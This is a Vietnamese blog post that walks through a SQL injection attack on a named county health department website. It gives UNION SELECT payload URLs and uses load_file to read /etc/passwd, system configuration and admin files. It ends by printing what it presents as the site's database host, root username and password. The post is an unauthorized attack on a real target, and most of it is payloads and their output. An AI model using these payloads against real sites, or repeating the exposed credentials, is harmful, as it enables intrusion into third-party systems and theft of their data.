Chủ Nhật, 22 tháng 12, 2013

Basic - Unable to run Query

victim : http://www.clarkhealthdept.org/news.phtml?id=2

ok, check lỗi

http://www.clarkhealthdept.org/news.phtml?id=2'

lỗi xuất hiện





Code:


Unable to run Query to get news



với lỗi này, kĩ thuật cũng hơi phức tạp 1 tí thui

ok, ta khai thác như bình thường, nhưng bạn để id= bình thường nó sẽ ko hiện lỗi, vì sao ư, có nhiều tut nói về cái này, đừng hỏi em

ok





Code:


http://www.clarkhealthdept.org/news.phtml?id=-999 union select 0,1,2,3,4/*



nếu thiếu số 0, chẳng ra cái jì cả

hoặc bạn có thể cho id= null cũng ra thui

ok, nó hiện ra





Code:


2
00/01/2000
3



giờ coi version thử nhá





Code:


http://www.clarkhealthdept.org/news.phtml?id=null union select 0,1,2,version(),4/*



giờ dùng chiêu load_file nào )





Code:


http://www.clarkhealthde...elect%200,1,2,load_file("/etc/passwd"),4/*



ặc ặc jì thế này

chú ý





Code:


news:*:8:8:News Subsystem:/:/sbin/nologin



rùi, ta làm jì nữa nhỉ

read file nhỉ





Code:


http://www.clarkhealthde...elect%200,1,2,load_file("/usr/local/include"),4/*



mún đọc file jì, cứ thêm đằng sau local/





Code:


http://www.clarkhealthde...elect%200,1,2,load_file("/usr/local/www"),4/*



ta phải xác định userid nữa

ta dùng 1 câu lệnh như sau.





Code:


http://www.clarkhealthde...elect%200,1,2,load_file("/etc/rc.conf"),4/*



KQ thu được: hostname="blackfoot.meginc.com" chẳng có gì ở đây. nhưng thông tin này cũng nên quan tâm.

Khi truy vấn câu lệnh này.





Code:


http://www.clarkhealthde...elect%200,1,2,load_file("/usr/local/www"),4/*



Ta có thể thấy 1 dòng chữ meginc ===> có lẽ đây là userid rồi đấy.





Code:


http://www.clarkhealthde...elect%200,1,2,load_file("/usr/local/www/meginc/"),4/*



lại hiện ra 1 loạt cái gì đó đúng h0k. lang thang kiếm được cái folder admin nè.





Code:


http://www.clarkhealthde...elect%200,1,2,load_file("/usr/local/www/meginc/admin/"),4/*



hiện ra tùm lun cái gì gì đó. db_connect.phtml ===> ơ thế cái này là cái gì nhỉ.





Code:


http://www.clarkhealthde...elect%200,1,2,load_file("/usr/local/www/meginc/admin/db_connect.phtml"),4/*



ô la lá





Code:


$hostname = "blackfoot.meginc.com";
$db_username = "root";
$db_password = "jd4495jv";
$db_name = "meg";



cái gì vậy ta. thôy đến đây là đủ rồi.

Related Post:



Người đăng: tuan vào lúc 05:17
Nhãn:
0

0 nhận xét:

Đăng nhận xét

Đăng ký: Đăng Nhận xét (Atom)
Gunakan Google Chrome Untuk Mendapatkan Tampilan Terbaik Blog Ini ( ^_^ )